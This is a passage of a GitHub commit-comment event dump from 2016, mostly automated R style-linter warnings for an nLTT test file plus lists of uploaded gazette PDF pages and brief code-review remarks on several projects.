^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:8:31:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​    t <- TESS::tess.sim.taxa(n=1, \n                             ~^~\n```\n[tests/testthat/test_abc_smc_nltt.R:8:34:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L8) *style:* **Trailing whitespace is superfluous.**\n```r\n​    t <- TESS::tess.sim.taxa(n=1, \n                                 ^\n```\n[tests/testthat/test_abc_smc_nltt.R:9:49:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L9) *style:* **Trailing whitespace is superfluous.**\n```r\n​                             lambda = params[1], \n                                                ^\n```\n[tests/testthat/test_abc_smc_nltt.R:10:51:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​                             mu = params[2], nTaxa=1000,max=100000)[[1]]\n                                                 ~^~\n```\n[tests/testthat/test_abc_smc_nltt.R:10:57:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L10) *style:* **Commas should always have a space after.**\n```r\n​                             mu = params[2], nTaxa=1000,max=100000)[[1]]\n                                                        ^\n```\n[tests/testthat/test_abc_smc_nltt.R:10:60:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​                             mu = params[2], nTaxa=1000,max=100000)[[1]]\n                                                          ~^~\n```\n[tests/testthat/test_abc_smc_nltt.R:13:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L13) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_abc_smc_nltt.R:15:20:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L15) *style:* **Put spaces around all infix operators.**\n```r\n​    return ( rexp(n=2, rate=1) )\n                  ~^~\n```\n[tests/testthat/test_abc_smc_nltt.R:15:28:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L15) *style:* **Put spaces around all infix operators.**\n```r\n​    return ( rexp(n=2, rate=1) )\n                          ~^~\n```\n[tests/testthat/test_abc_smc_nltt.R:17:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L17) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[tests/testthat/test_abc_smc_nltt.R:19:7:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(val[2] > val[1]) {\n      ^\n```\n[tests/testthat/test_abc_smc_nltt.R:20:12:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L20) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    return ( dexp( val[1], rate = 1) * \n           ^\n```\n[tests/testthat/test_abc_smc_nltt.R:22:39:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​    return ( dexp( val[1], rate = 1) * \n                                      ^\n```\n[tests/testthat/test_abc_smc_nltt.R:27:10:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L27) *style:* **Variable and function names should be all lowercase.**\n```r\n​  obs <- treeSim(c(20,0))\n         ^~~~~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:27:23:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L27) *style:* **Commas should always have a space after.**\n```r\n​  obs <- treeSim(c(20,0))\n                      ^\n```\n[tests/testthat/test_abc_smc_nltt.R:28:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L28) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_abc_smc_nltt.R:37:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L37) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_abc_smc_nltt.R:41:35:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L41) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    return(-1 * LL_BD(params, obs) )\n                                  ^\n```\n[tests/testthat/test_abc_smc_nltt.R:45:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L45) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_abc_smc_nltt.R:47:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L47) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_abc_smc_nltt.R:48:3:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L48) *style:* **Variable and function names should be all lowercase.**\n```r\n​  statWrapper <- function(tree1) {\n  ^~~~~~~~~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:49:14:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L49) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return ( nLTTstat(tree1, obs, \"abs\"))\n             ^~~~~~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:53:12:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L53) *style:* **Variable and function names should be all lowercase.**\n```r\n​    obs, c(statWrapper), treeSim, init_epsilon_values = 0.1,\n           ^~~~~~~~~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:53:26:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L53) *style:* **Variable and function names should be all lowercase.**\n```r\n​    obs, c(statWrapper), treeSim, init_epsilon_values = 0.1,\n                         ^~~~~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:58:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L58) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_abc_smc_nltt.R:61:60:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L61) *style:* **Trailing whitespace is superfluous.**\n```r\n​                         iterations = 10000, burnin = 1000, \n                                                           ^\n```\n[tests/testthat/test_abc_smc_nltt.R:66:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L66) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_abc_smc_nltt.R:71:3:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L71) *style:* **Variable and function names should be all lowercase.**\n```r\n​  treeSim <- function(params) {\n  ^~~~~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:72:31:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​    t <- TESS::tess.sim.taxa(n=1, \n                             ~^~\n```\n[tests/testthat/test_abc_smc_nltt.R:72:34:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​    t <- TESS::tess.sim.taxa(n=1, \n                                 ^\n```\n[tests/testthat/test_abc_smc_nltt.R:73:49:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L73) *style:* **Trailing whitespace is superfluous.**\n```r\n​                             lambda = params[1], \n                                                ^\n```\n[tests/testthat/test_abc_smc_nltt.R:74:51:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L74) *style:* **Put spaces around all infix operators.**\n```r\n​                             mu = params[2], nTaxa=1000,max=100000)[[1]]\n                                                 ~^~\n```\n[tests/testthat/test_abc_smc_nltt.R:74:57:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L74) *style:* **Commas should always have a space after.**\n```r\n​                             mu = params[2], nTaxa=1000,max=100000)[[1]]\n                                                        ^\n```\n[tests/testthat/test_abc_smc_nltt.R:74:60:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L74) *style:* **Put spaces around all infix operators.**\n```r\n​                             mu = params[2], nTaxa=1000,max=100000)[[1]]\n                                                          ~^~\n```\n[tests/testthat/test_abc_smc_nltt.R:77:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L77) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_abc_smc_nltt.R:79:20:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​    return ( rexp(n=2, rate=1) )\n                  ~^~\n```\n[tests/testthat/test_abc_smc_nltt.R:79:28:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​    return ( rexp(n=2, rate=1) )\n                          ~^~\n```\n[tests/testthat/test_abc_smc_nltt.R:81:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L81) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_abc_smc_nltt.R:83:7:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L83) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(val[2] > val[1]) {\n      ^\n```\n[tests/testthat/test_abc_smc_nltt.R:86:39:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L86) *style:* **Trailing whitespace is superfluous.**\n```r\n​    return ( dexp( val[1], rate = 1) * \n                                      ^\n```\n[tests/testthat/test_abc_smc_nltt.R:89:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L89) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_abc_smc_nltt.R:90:3:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  statWrapper <- function(tree1) {\n  ^~~~~~~~~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:91:14:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return ( nLTTstat(tree1, obs, \"abs\"))\n             ^~~~~~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:93:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L93) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_abc_smc_nltt.R:96:13:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​      42, c(statWrapper), treeSim, init_epsilon_values = 0.1,\n            ^~~~~~~~~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:96:27:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​      42, c(statWrapper), treeSim, init_epsilon_values = 0.1,\n                          ^~~~~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:102:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L102) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_abc_smc_nltt.R:103:10:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L103) *style:* **Variable and function names should be all lowercase.**\n```r\n​  obs <- treeSim(c(1,0))\n         ^~~~~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:103:22:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L103) *style:* **Commas should always have a space after.**\n```r\n​  obs <- treeSim(c(1,0))\n                     ^\n```\n[tests/testthat/test_abc_smc_nltt.R:105:25:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​    abc_smc_nltt(obs, c(statWrapper), treeSim, init_epsilon_values = -0.5,\n                        ^~~~~~~~~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:105:39:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​    abc_smc_nltt(obs, c(statWrapper), treeSim, init_epsilon_values = -0.5,\n                                      ^~~~~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:111:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L111) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_abc_smc_nltt.R:112:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L112) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_abc_smc_nltt.R:113:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L113) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_abc_smc_nltt.R:114:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L114) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_abc_smc_nltt.R:116:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L116) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[tests/testthat/test_mcmc_nltt.R:74:29:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_mcmc_nltt.R#L74) *style:* **Commas should always have a space after.**\n```r\n​    mcmc_nltt( tree1, LL_BD,c(1, -1), c(TRUE, TRUE),\n                            ^\n```"}},"created_at":"2016-09-14T15:22:51Z"}
{"id":"4562663537","type":"CommitCommentEvent","actor":{"login":"bcb14g"},"repo":{"name":"bcb14g/dig-eg-gaz"},"payload":{"comment":{"id":19020951,"position":null,"line":null,"path":null,"commit_id":"6b40105d8a6057bb24ec07333b5c5b3cde071bf2","created_at":"2016-09-14T15:23:31Z","updated_at":"2016-09-14T15:23:31Z","body":"[1905-02-06-p1.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472428/1905-02-06-p1.pdf)\r\n[1905-02-06-p2.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472429/1905-02-06-p2.pdf)\r\n[1905-02-06-p3.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472425/1905-02-06-p3.pdf)\r\n[1905-02-06-p4.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472426/1905-02-06-p4.pdf)\r\n[1905-02-06-p5.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472427/1905-02-06-p5.pdf)\r\n[1905-02-06-p6.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472424/1905-02-06-p6.pdf)\r\n[1905-02-06-p7.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472430/1905-02-06-p7.pdf)\r\n[1905-02-07-p1.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472434/1905-02-07-p1.pdf)\r\n[1905-02-07-p2.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472433/1905-02-07-p2.pdf)\r\n[1905-02-07-p3.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472432/1905-02-07-p3.pdf)\r\n[1905-02-07-p4.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472431/1905-02-07-p4.pdf)\r\n[1905-02-07-p5.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472436/1905-02-07-p5.pdf)\r\n[1905-02-07-p6.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472444/1905-02-07-p6.pdf)\r\n[1905-02-07-p7.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472435/1905-02-07-p7.pdf)\r\n[1905-02-07-p8.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472437/1905-02-07-p8.pdf)\r\n[1905-02-08-p1.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472438/1905-02-08-p1.pdf)\r\n[1905-02-08-p2.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472440/1905-02-08-p2.pdf)\r\n[1905-02-08-p3.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472439/1905-02-08-p3.pdf)\r\n[1905-02-08-p4.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472442/1905-02-08-p4.pdf)\r\n[1905-02-08-p5.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472441/1905-02-08-p5.pdf)\r\n[1905-02-08-p6.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472443/1905-02-08-p6.pdf)\r\n[1905-02-08-p7.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472446/1905-02-08-p7.pdf)\r\n[1905-02-08-p8.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472445/1905-02-08-p8.pdf)\r\n[Uploading 1905-02-09-p1.pdf…]()\r\n[Uploading 1905-02-09-p2.pdf…]()\r\n[Uploading 1905-02-09-p3.pdf…]()\r\n[Uploading 1905-02-09-p4.pdf…]()\r\n[Uploading 1905-02-09-p5.pdf…]()\r\n[Uploading 1905-02-09-p6.pdf…]()\r\n[Uploading 1905-02-09-p7.pdf…]()\r\n[Uploading 1905-02-09-p8.pdf…]()\r\n[Uploading 1905-02-10-p1.pdf…]()\r\n[Uploading 1905-02-10-p2.pdf…]()\r\n[Uploading 1905-02-10-p3.pdf…]()\r\n[Uploading 1905-02-10-p4.pdf…]()\r\n[Uploading 1905-02-10-p5.pdf…]()\r\n[Uploading 1905-02-10-p6.pdf…]()\r\n[Uploading 1905-02-10-p7.pdf…]()\r\n[Uploading 1905-02-11-p1.pdf…]()\r\n[Uploading 1905-02-11-p2.pdf…]()\r\n[Uploading 1905-02-11-p3.pdf…]()\r\n[Uploading 1905-02-11-p4.pdf…]()\r\n[Uploading 1905-02-11-p5.pdf…]()\r\n[Uploading 1905-02-11-p6.pdf…]()\r\n[Uploading 1905-02-11-p7.pdf…]()\r\n[Uploading 1905-02-11-p8.pdf…]()\r\n[Uploading 1905-02-11-p9.pdf…]()\r\n"}},"created_at":"2016-09-14T15:23:31Z"}
{"id":"4562664471","type":"CommitCommentEvent","actor":{"login":"Wallbraker"},"repo":{"name":"VoltLang/Volta"},"payload":{"comment":{"id":19020961,"position":86,"line":170,"path":"rt/src/vrt/gc/rbtree.volt","commit_id":"774671b1f6331a0c0434ad9754fa20e52f243f1f","created_at":"2016-09-14T15:23:38Z","updated_at":"2016-09-14T15:23:38Z","body":"That should be ColorShift"}},"created_at":"2016-09-14T15:23:38Z"}
{"id":"4562665159","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19020966,"position":15,"line":36,"path":"src/game/AI/ReactorAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T15:23:45Z","updated_at":"2016-09-14T15:23:45Z","body":"You're right. I have too much of a habbit of mixing different kinds of work/improvement in commits."}},"created_at":"2016-09-14T15:23:45Z"}
{"id":"4562667675","type":"CommitCommentEvent","actor":{"login":"aq1018"},"repo":{"name":"aq1018/mongoid-history"},"payload":{"comment":{"id":19020980,"position":null,"line":null,"path":null,"commit_id":"75c200fba411530047c1c23a750aff05f93ac836","created_at":"2016-09-14T15:24:09Z","updated_at":"2016-09-14T15:24:09Z","body":"@dblock, you are more than welcome to take this repo since you are the one who has been maintaining it for all these years. `mongoid-history` won't be what it is today without you. :)"}},"created_at":"2016-09-14T15:24:09Z"}
{"id":"4562669753","type":"CommitCommentEvent","actor":{"login":"bhelyer"},"repo":{"name":"VoltLang/Volta"},"payload":{"comment":{"id":19020991,"position":86,"line":170,"path":"rt/src/vrt/gc/rbtree.volt","commit_id":"774671b1f6331a0c0434ad9754fa20e52f243f1f","created_at":"2016-09-14T15:24:28Z","updated_at":"2016-09-14T15:24:28Z","body":"ColourShift*"}},"created_at":"2016-09-14T15:24:28Z"}
{"id":"4562671367","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":19020996,"position":null,"line":null,"path":null,"commit_id":"3f2f3cd2d7d7e2874f470588fb0e41d4fc4b22f1","created_at":"2016-09-14T15:24:43Z","updated_at":"2016-09-14T15:24:43Z","body":":clap:"}},"created_at":"2016-09-14T15:24:43Z"}
{"id":"4562674122","type":"CommitCommentEvent","actor":{"login":"JeroenVinke"},"repo":{"name":"monterey-framework/monterey"},"payload":{"comment":{"id":19021006,"position":14,"line":72,"path":"app/locales/en/translation.json","commit_id":"bc8647941e6c0e13f1cd2259a621794d274127da","created_at":"2016-09-14T15:25:11Z","updated_at":"2016-09-14T15:25:11Z","body":"@adriatic I believe something may have gone wrong here. In translation.json I would expect to find tooltip-about, tooltip-preferences and tooltip-support since there are tooltip custom attributes like `tooltip=\"tooltip-about\"` and `tooltip=\"tooltip-preferences\"`. Can you confirm that every string in tooltip attributes have a matching declaration in translation.json?"}},"created_at":"2016-09-14T15:25:11Z"}
{"id":"4562683639","type":"CommitCommentEvent","actor":{"login":"JeroenVinke"},"repo":{"name":"monterey-framework/monterey"},"payload":{"comment":{"id":19021052,"position":14,"line":72,"path":"app/locales/en/translation.json","commit_id":"bc8647941e6c0e13f1cd2259a621794d274127da","created_at":"2016-09-14T15:26:37Z","updated_at":"2016-09-14T15:26:37Z","body":"Then again, you may have added these but somehow it wasnt committed, as the last commit happened 17 hours ago (which in monterey development is an eternity :))"}},"created_at":"2016-09-14T15:26:37Z"}
{"id":"4562684476","type":"CommitCommentEvent","actor":{"login":"smillst"},"repo":{"name":"typetools/checker-framework"},"payload":{"comment":{"id":19021053,"position":11,"line":591,"path":"framework/src/org/checkerframework/framework/util/typeinference/DefaultTypeArgumentInference.java","commit_id":"2d2825ee0139d58ba4e9ed385e2da60745cb2300","created_at":"2016-09-14T15:26:44Z","updated_at":"2016-09-14T15:26:44Z","body":"Addressed here 14071db"}},"created_at":"2016-09-14T15:26:44Z"}
{"id":"4562692786","type":"CommitCommentEvent","actor":{"login":"bcb14g"},"repo":{"name":"bcb14g/dig-eg-gaz"},"payload":{"comment":{"id":19021068,"position":null,"line":null,"path":null,"commit_id":"47625dec2e16afa7bcdcbdca72bd63eca79e6603","created_at":"2016-09-14T15:28:01Z","updated_at":"2016-09-14T15:28:01Z","body":"[1905-02-06-p1.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472477/1905-02-06-p1.pdf)\r\n[1905-02-06-p2.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472476/1905-02-06-p2.pdf)\r\n[1905-02-06-p3.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472480/1905-02-06-p3.pdf)\r\n[1905-02-06-p4.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472475/1905-02-06-p4.pdf)\r\n[1905-02-06-p5.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472478/1905-02-06-p5.pdf)\r\n[1905-02-06-p6.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472479/1905-02-06-p6.pdf)\r\n[1905-02-06-p7.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472482/1905-02-06-p7.pdf)\r\n[1905-02-07-p1.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472481/1905-02-07-p1.pdf)\r\n[1905-02-07-p2.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472483/1905-02-07-p2.pdf)\r\n[1905-02-07-p3.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472484/1905-02-07-p3.pdf)\r\n[1905-02-07-p4.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472485/1905-02-07-p4.pdf)\r\n[1905-02-07-p5.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472486/1905-02-07-p5.pdf)\r\n[1905-02-07-p6.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472487/1905-02-07-p6.pdf)\r\n[1905-02-07-p7.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472488/1905-02-07-p7.pdf)\r\n[1905-02-07-p8.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472489/1905-02-07-p8.pdf)\r\n[1905-02-08-p1.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472491/1905-02-08-p1.pdf)\r\n[1905-02-08-p2.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472490/1905-02-08-p2.pdf)\r\n[1905-02-08-p3.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472493/1905-02-08-p3.pdf)\r\n[1905-02-08-p4.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472492/1905-02-08-p4.pdf)\r\n[1905-02-08-p5.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472495/1905-02-08-p5.pdf)\r\n[1905-02-08-p6.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472499/1905-02-08-p6.pdf)\r\n[1905-02-08-p7.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472494/1905-02-08-p7.pdf)\r\n[1905-02-08-p8.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472496/1905-02-08-p8.pdf)\r\n[1905-02-09-p1.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472497/1905-02-09-p1.pdf)\r\n[1905-02-09-p2.pdf](https://github.com/bcb14g/dig-eg-gaz/files/472498/1905-02-09-p2.pdf)\r\n[Uploading 1905-02-09-p3.pdf…]()\r\n[Uploading 1905-02-09-p4.pdf…]()\r\n[Uploading 1905-02-09-p5.pdf…]()\r\n[Uploading 1905-02-09-p6.pdf…]()\r\n[Uploading 1905-02-09-p7.pdf…]()\r\n[Uploading 1905-02-09-p8.pdf…]()\r\n[Uploading 1905-02-10-p1.pdf…]()\r\n[Uploading 1905-02-10-p2.pdf…]()\r\n[Uploading 1905-02-10-p3.pdf…]()\r\n[Uploading 1905-02-10-p4.pdf…]()\r\n[Uploading 